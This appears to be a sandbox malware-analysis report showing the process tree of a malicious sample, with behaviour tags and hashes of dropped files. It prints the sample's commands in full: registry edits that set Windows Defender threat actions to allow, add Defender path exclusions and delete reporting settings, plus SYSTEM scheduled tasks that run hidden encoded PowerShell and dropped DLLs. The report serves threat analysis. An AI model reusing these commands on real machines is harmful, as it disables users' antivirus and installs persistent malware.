C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1804
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1076
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmIuiaUkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmIuiaUkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eDwjHUlQleiMyYJGGLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eDwjHUlQleiMyYJGGLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lKYgjwJOgvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lKYgjwJOgvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uDDeUXeESnNQC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uDDeUXeESnNQC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wRBWtgmhNVeU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wRBWtgmhNVeU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZfiCmUjLAGfhaMVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZfiCmUjLAGfhaMVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rGlQBArSxsGkYLmXo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rGlQBArSxsGkYLmXo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lQBNidPHeEdsbZIs\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lQBNidPHeEdsbZIs\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:100 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmIuiaUkU" /t REG_DWORD /d 0 /reg:323⤵PID:3036
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmIuiaUkU" /t REG_DWORD /d 0 /reg:324⤵PID:2520
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmIuiaUkU" /t REG_DWORD /d 0 /reg:643⤵PID:4612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eDwjHUlQleiMyYJGGLR" /t REG_DWORD /d 0 /reg:323⤵PID:2984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eDwjHUlQleiMyYJGGLR" /t REG_DWORD /d 0 /reg:643⤵PID:3628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lKYgjwJOgvUn" /t REG_DWORD /d 0 /reg:323⤵PID:4848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lKYgjwJOgvUn" /t REG_DWORD /d 0 /reg:643⤵PID:5096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uDDeUXeESnNQC" /t REG_DWORD /d 0 /reg:323⤵PID:3128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uDDeUXeESnNQC" /t REG_DWORD /d 0 /reg:643⤵PID:4136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRBWtgmhNVeU2" /t REG_DWORD /d 0 /reg:323⤵PID:4940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRBWtgmhNVeU2" /t REG_DWORD /d 0 /reg:643⤵PID:424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZfiCmUjLAGfhaMVB /t REG_DWORD /d 0 /reg:323⤵PID:4684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZfiCmUjLAGfhaMVB /t REG_DWORD /d 0 /reg:643⤵PID:4760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rGlQBArSxsGkYLmXo /t REG_DWORD /d 0 /reg:323⤵PID:3044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rGlQBArSxsGkYLmXo /t REG_DWORD /d 0 /reg:643⤵PID:2800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lQBNidPHeEdsbZIs /t REG_DWORD /d 0 /reg:323⤵PID:3088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lQBNidPHeEdsbZIs /t REG_DWORD /d 0 /reg:643⤵PID:4880
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggPajZhab" /SC once /ST 00:20:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggPajZhab"2⤵PID:1884
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggPajZhab"2⤵PID:1408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cIepPELucUFHyMmti" /SC once /ST 00:22:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lQBNidPHeEdsbZIs\eNZpldWDKcxRPpI\wjxWvSc.exe\" gV /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cIepPELucUFHyMmti"2⤵PID:1000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1204 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3884
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3680
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3148
-
C:\Windows\Temp\lQBNidPHeEdsbZIs\eNZpldWDKcxRPpI\wjxWvSc.exeC:\Windows\Temp\lQBNidPHeEdsbZIs\eNZpldWDKcxRPpI\wjxWvSc.exe gV /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:968 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bhCXYHDqWKjBKHFGxm"2⤵PID:884
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:1588
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1384
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4708
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4268
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RmIuiaUkU\LYwOmk.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "LVkMoXcLjpRBuIo" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LVkMoXcLjpRBuIo2" /F /xml "C:\Program Files (x86)\RmIuiaUkU\gbOOlzK.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "LVkMoXcLjpRBuIo"2⤵PID:3712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LVkMoXcLjpRBuIo"2⤵PID:4908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TISbqxrSJQUwZU" /F /xml "C:\Program Files (x86)\wRBWtgmhNVeU2\sxPDPHA.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PQTZJmsRcasma2" /F /xml "C:\ProgramData\ZfiCmUjLAGfhaMVB\JbGzjLB.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zjQsxGFMYDlpHmwWS2" /F /xml "C:\Program Files (x86)\eDwjHUlQleiMyYJGGLR\NqhFfRJ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "whpULVImHDJOTOBzmAk2" /F /xml "C:\Program Files (x86)\uDDeUXeESnNQC\ndPITLv.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2864
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JuOTSXziioNjcYMEt" /SC once /ST 00:26:06 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\lQBNidPHeEdsbZIs\nKijYpaI\nnSzhFm.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3708
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "JuOTSXziioNjcYMEt"2⤵PID:2784
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:5052
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:4092
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2132
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "cIepPELucUFHyMmti"2⤵PID:4052
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lQBNidPHeEdsbZIs\nKijYpaI\nnSzhFm.dll",#1 /site_id 5254031⤵PID:3692
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lQBNidPHeEdsbZIs\nKijYpaI\nnSzhFm.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3068 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JuOTSXziioNjcYMEt"3⤵PID:4668
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD543971555f83f947b44cdae815eb2251b
SHA132c7a6e76237bf67f2080143b8573c30d6e96bda
SHA2567e6175415c30dd703a63a28eebe0b372c3c1782b02631360bd8b60e9f4a4ef19
SHA5128ec710bf055e69807681cd9bd4a7fa1e01062555eabfd291f8e1364697db05e2ecbd48b90b8ddcd202f5046c9bb6166bc580a21537838f5cd8ccae32c1508078
-
Filesize
2KB
MD5fc4b67731aeab6d886a4c5db1d5f3454
SHA18b379acfa1950fde4c4f4bf1683d807d03c01d82
SHA2563d072b31a32f079bfe2a2da8465e8a712d4c88f3261811f03fc213e08fc20a48
SHA512e0bb1823c99a2bbc6a4515acebfa82123d0aaaa179404b9ab39a09fc78a7ea13d7b23c23e61e44b9810f4f7fa879b17e600d2c861ae364d623510967c1debfc9
-
Filesize
2KB
MD52c8fe8b27f1cde35ed99b93e1748540c
SHA172b2aa25a20d56ca601ee2b2cbcacda88bcc9c3b
SHA25664cacc94fc6537e400a5db0ddba8b4d0522ffa8c9adf7d2f750f4c09927cf79a
SHA512db3cd9c9292eca094b233ceda695a4f309a8f9b8ba3d1ccabfbd42f967e4484db23396a708f9e7b7441436137fe459525b46360bef787373dc49180070744384
-
Filesize
2KB
MD54d0fdef18c4789c5fd2bf6167db9145b
SHA17efadc57abbc050955a0d81cdcde343a777cd70c
SHA256f16d1427b0fc7a264c369595678535134dd4521a7cae4f86b27540a7da07719b
SHA5124e7ba77f9d159d4eb1e325a92fd233607d092bce5eace6849a8f1b3bc6d569697dc5524e01ec2691770c4c0b91f4489eef95829d952311baadfcdcc1a9f0fcdc
-
Filesize
2KB
MD5869c55a9d30ce09caa13a1a7832ce0bc
SHA127f46a8bd8f5ac5bf66b6f059cca29d0cf68c70b
SHA2566bc75f343d4f96fb2bf496edd92004128b1996c8d8801cdcc15294a3ef057d27
SHA5126cb8850dc41bf579139244b920613ac0756429c409a3f5dda9f0eb83e46e5a5f1baa042ad6a6791fb3ccbb24c356a60d1bd9f012c964b1101c04b2f0fb8c0e0d
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
6.2MB
MD51ef451d2ab83d64dfa406dfb79e389ea
SHA16f4492950ba4febf92fd9230399f63c42b9a888e
SHA2568a81c8bfa6a586f39480b8e52aa592e0aa89c687f490625f516eb85d0ff7c1b0
